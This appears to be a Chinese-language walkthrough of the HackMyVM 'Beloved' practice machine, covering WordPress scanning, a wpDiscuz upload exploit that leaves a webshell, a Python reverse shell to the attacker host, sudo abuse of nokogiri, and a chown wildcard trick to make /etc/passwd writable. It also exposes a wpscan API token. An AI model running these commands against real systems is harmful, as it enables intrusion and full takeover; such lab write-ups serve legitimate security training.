靶机信息
下载地址:
https://hackmyvm.eu/machines/machine.php?vm=Beloved
网盘链接:https://pan.baidu.com/s/1OjMwuU6F1V98x2UnLz-eHA?pwd=xcvx
靶场: HackMyVm.eu
靶机名称: Beloved
难度: 简单
发布时间: 2021年6月29日
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only
靶机:Vbox linux IP自动获取 网卡host-Only
信息收集
扫描主机
扫描局域网内的靶机IP地址
ping -ag 10.0.0.0/24 2>/dev/null
扫描到主机地址为10.0.0.155
扫描端口
扫描靶机开放的服务端口
sudo nmap -sC -sV -p- 10.0.0.155 -oN nmap.log
扫描到22和80端口开放,先来看看80端口
Web渗透
访问后发现是wordpress程序,源码中发现需要绑定域名
绑定域名
vi /etc/hosts
绑定后使用wpscan扫描wordpress程序漏洞
WordPress漏洞利用
wpscan --url http://beloved --api-token F0y3fug9G1J53tJH5q1QovCO8g7pp7WA0XBB99s7eds --plugins-detection aggressive
找到个文件上传漏洞,搜索下exp
searchsploit wpDiscuz
还可以远程代码执行,验证一下
searchsploit -m 49967
python3 49967.py -u http://10.0.0.155 -p /2021/06/09/hello-world
命令执行失败,但是还有webshell地址在,来试试能否利用
http://beloved/wp-content/uploads/2022/04/seuygydldrdmdpw-1651337461.0428.php?cmd=id
可以执行命令,试试反弹shell
1。攻击机监听4444端口
nc -lvvp 4444
2。执行反弹payload
http://beloved/wp-content/uploads/2022/04/seuygydldrdmdpw-1651337461.0428.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
反弹成功,来找找敏感信息
cd /var/www
ls -al
在/var/www目录下找到.bash_history文件,查看一下内容
cat .bash_history
发现一条命令是以beloved用户身份执行的,看起来像是sudo提权,来看看哪些程序不需要密码访问
sudo -l
果然可以用beloved用户身份执行nokogiri,来看看这是个什么程序
sudo -u beloved /usr/local/bin/nokogiri --help
sudo -u beloved /usr/local/bin/nokogiri /etc/passwd
system '/bin/bash'
拿到beloved权限,继续查找可提权的信息
cd ~
ls -al
cat user.txt
拿到user.txt,发现.bash_history来查看下内容
cat .bash_history
看上去/opt目录下有个id_rsa文件可以登录root用户,验证下
cd /opt
ssh -i id_rsa root@localhost
还需要密码,上传个pspy64检查一下定时执行的任务
1。攻击机在pspy64目录下开启HTTP服务
python3 -m http.server
2。靶机下载pspy64,并运行
cd /tmp
wget http://10.0.0.3:8000/pspy64
chmod +x pspy64
./pspy64
发现root用户在后台每分钟执行一次chown rot:root *,我们可以利用chown的--reference参数将文件的权限复制给另一个文件,验证一下
cd /opt
touch reference
touch -- --reference=reference
ln -s /etc/passwd
简单解释下:
因为chown root:root后面这个*,让后台程序运行起来变成 chown root:root --reference=reference id_rsa passwd,此时--reference文件变成了参数。
等待1分钟然后查看/etc/passwd文件权限
ls -al /etc/passwd
权限复制成功,接下来生成一个密码,再将密码替换/etc/passwd文件中root用户信息中的第1个x
openssl passwd -1 123123
vi /etc/passwd
OK替换成功,切换到root用户
su
查找flag
cat /root/root.txt
拿到root.txt,游戏结束。
原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No. 86 Beloved
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论